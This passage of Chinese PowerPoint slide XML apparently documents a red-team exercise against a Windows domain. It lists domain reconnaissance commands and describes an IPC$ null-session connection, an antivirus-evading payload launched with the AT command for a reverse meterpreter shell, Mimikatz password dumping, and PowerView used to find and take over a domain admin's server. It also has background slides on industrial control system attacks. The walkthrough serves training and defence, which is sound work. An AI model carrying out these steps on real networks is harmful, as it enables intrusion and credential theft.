              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>查看域用户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600" dirty="0"/>
              <a:t>net view /domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>查看有几个域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600" dirty="0"/>
              <a:t>net view /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>domain:XXX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>查看此域内主机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600" dirty="0"/>
              <a:t>net group /domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>查询域里面的组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600" dirty="0"/>
              <a:t>net group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>domain computers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> /domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>查看域内所有主机名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600" dirty="0"/>
              <a:t>net group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>domain admins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> /domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>查看域管理员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600" dirty="0"/>
              <a:t>net group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>domain controllers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> /domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>查看域控制器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600" dirty="0"/>
              <a:t>net group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>enterprise admins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> /domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>查看企业管理组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1600" dirty="0"/>
              <a:t>nettime/domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>查看时间服务器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0"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lvl="1" indent="0"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Step2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：信息收集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457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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90246" y="42861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查看域控制器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95248" y="42861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查看企业管理组</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9" descr="mark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2204671"/>
            <a:ext cx="4633546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mar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0106" y="2214196"/>
            <a:ext cx="4463893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32788" y="4856984"/>
            <a:ext cx="7146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分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>上述类似内网信息，重点包含以下几个方面：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zh-CN" sz="1600" dirty="0"/>
              <a:t>内网是怎么划分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>的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r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>各个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>机器名的命名规则，根据机器命名尝试找出重要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>人物电脑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r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>还域结构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是否</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>是多层域结构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>等等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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>猜证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>域管理员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>的名字和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>域服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>名字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Step3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>拓展控制，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>服务器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zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>net view</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>的机器名里选择一个和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>当前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>机器名相似的服务器来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>IPC$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>空连接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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>成功！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>免杀的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>PAYLOAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>上传到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>PAVMSEP131</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>服务器，然后利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>AT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>命令启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>PAYLOAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>，反弹回来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> shell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 descr="mark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9887" y="2327379"/>
            <a:ext cx="44862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mark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94025" y="3982095"/>
            <a:ext cx="6456870" cy="736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6933967" y="4117079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copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>木马到目标文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="mark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900" y="4952369"/>
            <a:ext cx="4206241" cy="8195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289651" y="5877395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查看当前系统时间</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="mark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3905" y="4952369"/>
            <a:ext cx="4206241" cy="81951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5386662" y="5782778"/>
            <a:ext cx="2199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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>AT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>命令启动反弹木马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5" y="882128"/>
            <a:ext cx="8372163" cy="583363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zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>背景介绍</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b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针对工控网的攻击增多，呈现增长趋势</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3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早期案例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>2010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>伊朗核电站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>震网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>病毒</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>伊朗纳坦兹铀离心</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>设施</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>2006-2010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4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RPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>远程执行漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>MS08-067</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>）、快捷方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>文件解析漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>MS10-046</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>）、打印机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>后台程序服务漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>MS10-061</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>）、内核</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>模式驱动程序漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>MS10-073</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>）、任务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>计划程序程序漏洞（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>MS10-092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lvl="4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近期案例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>2019</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>年委内瑞拉、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>年乌克兰电网瘫痪</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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原因</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"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物联网、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>AI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>加持下，工业互联网在普及推广</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3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3"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传统工业控制网络体系架构无法适应安全需求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3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3"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大国网络空间博弈在升级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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>演习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>概况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4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Step3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>获取服务器权限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sz="1600" dirty="0" smtClean="0"/>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>，反弹成功，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>获得了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>pavmsep131</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> shell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 descr="mark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6470" y="2497501"/>
            <a:ext cx="4516364" cy="11823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002322" y="4060967"/>
            <a:ext cx="5644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查看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PAVMSEP131</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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服务器的信息和现在的权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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6" name="图片 5" descr="mar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6470" y="4565136"/>
            <a:ext cx="4516364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144660" y="5242631"/>
            <a:ext cx="2659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直接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>getshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>提权为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SYSTEM</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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Step3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>：挖掘该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>价值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sz="1400" dirty="0" smtClean="0"/>
              <a:t>当前权限可使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>抓取用户口令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>: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 descr="mark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163" y="2359215"/>
            <a:ext cx="4471837" cy="87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mar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163" y="3429000"/>
            <a:ext cx="4471837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465134" y="2036049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查看抓取到域用户的权限：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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3826"/>
            <a:ext cx="4510401" cy="4114124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Step3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>寻找域管在线</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>服务器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1600" dirty="0" smtClean="0"/>
              <a:t>上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>powerview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>定位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>域管理员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>在线登录的服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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 smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>域管理员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>当前在线登陆的机器为主机名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>PAVMSXD30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>10.51.0.30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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2225558"/>
            <a:ext cx="3789680" cy="3913404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Step4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>获取域管权限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1400" dirty="0"/>
              <a:t>再次使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>IPC$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>空连接获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>PAVMSXD30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>主机的权限。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/>
              <a:t>尝试使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>getsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>获取提升权限：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>查看当前权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone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zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>看到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>现在的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>UID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>sonicwall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>，从前面获取到的域管理员账号信息中，得知</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>sonicwall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>域管理员</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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zh-CN" sz="1400" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
